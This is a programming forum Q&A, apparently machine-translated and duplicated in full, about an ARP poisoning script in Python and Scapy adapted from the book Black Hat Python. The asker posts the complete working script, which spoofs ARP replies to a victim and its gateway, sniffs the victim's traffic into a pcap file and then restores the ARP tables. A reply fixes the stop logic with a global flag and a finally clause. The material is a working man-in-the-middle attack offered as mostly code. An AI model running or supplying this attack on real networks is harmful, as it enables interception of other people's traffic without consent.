ArpPoisoning With Python , BlackHat 书
ArpPoisoning With Python , BlackHat Book
我试着写了一个基于 blackhat python 书的 arppoisoning 程序!
它工作正常,一切都很好,但是当我想用 ctrl+c 停止程序时,keybordinterrupt 异常不起作用!
我的恢复目标 运行 两次,因为它打印“[*] 恢复目标”显示了 2 次!
这是我的全部代码:
from scapy.all import *
import os
import sys
import threading
import signal
interface = raw_input("Enter Interface name :> ")
target_ip = "192.168.43.180"
gateway_ip = "192.168.43.1"
packet_count = 10
conf.iface = interface
conf.verb = 0
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
print "[*] Restoring Target..."
send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
os.kill(os.getpid(),signal.SIGINT)
def get_mac(ip_address):
responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
for s,r in responses :
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Begining ARP Poisoning:"
while True:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print ".:ARP poison Attack Finished:."
return
print ".: Setting Up %s :." % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "Failed to Get Gateway MAC..."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac)
target_mac= get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print " \n[*] Start snifing for %d Packets \n" %packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
wrpcap('arper.pcap',packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
好的,我遇到了同样的问题。
问题出在 poison_target 函数中的 while True 循环:此循环永远不会退出。
查看可下载代码后,您会发现与本书中的代码存在一些细微差别。特别是,作者在主要错误处理中使用了 poisoning 全局和一个 finally 子句:
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
'''poison'''
global poisoning
--snip--
print '[*] Begining the ARP poison. [CTRL-C to stop]'
while poisoning:
send(poison_t)
send(poison_g)
time.sleep(2)
print '[*] ARP poison attack finished.'
return
然后在主代码中:
--snip--
poisoning = True
poison_thread.start()
try:
--snip--
packets = sniff(count=count, filter=bpf_filter, iface=interface)
except KeyboardInterrupt:
pass
finally:
--snip--
poisoning = False
time.sleep(2)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
--snip--
我试着写了一个基于 blackhat python 书的 arppoisoning 程序! 它工作正常,一切都很好,但是当我想用 ctrl+c 停止程序时,keybordinterrupt 异常不起作用! 我的恢复目标 运行 两次,因为它打印“[*] 恢复目标”显示了 2 次! 这是我的全部代码:
from scapy.all import *
import os
import sys
import threading
import signal
interface = raw_input("Enter Interface name :> ")
target_ip = "192.168.43.180"
gateway_ip = "192.168.43.1"
packet_count = 10
conf.iface = interface
conf.verb = 0
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
print "[*] Restoring Target..."
send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
os.kill(os.getpid(),signal.SIGINT)
def get_mac(ip_address):
responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
for s,r in responses :
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Begining ARP Poisoning:"
while True:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print ".:ARP poison Attack Finished:."
return
print ".: Setting Up %s :." % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "Failed to Get Gateway MAC..."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac)
target_mac= get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print " \n[*] Start snifing for %d Packets \n" %packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
wrpcap('arper.pcap',packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
好的,我遇到了同样的问题。
问题出在 poison_target 函数中的 while True 循环:此循环永远不会退出。
查看可下载代码后,您会发现与本书中的代码存在一些细微差别。特别是,作者在主要错误处理中使用了 poisoning 全局和一个 finally 子句:
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
'''poison'''
global poisoning
--snip--
print '[*] Begining the ARP poison. [CTRL-C to stop]'
while poisoning:
send(poison_t)
send(poison_g)
time.sleep(2)
print '[*] ARP poison attack finished.'
return
然后在主代码中:
--snip--
poisoning = True
poison_thread.start()
try:
--snip--
packets = sniff(count=count, filter=bpf_filter, iface=interface)
except KeyboardInterrupt:
pass
finally:
--snip--
poisoning = False
time.sleep(2)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
--snip--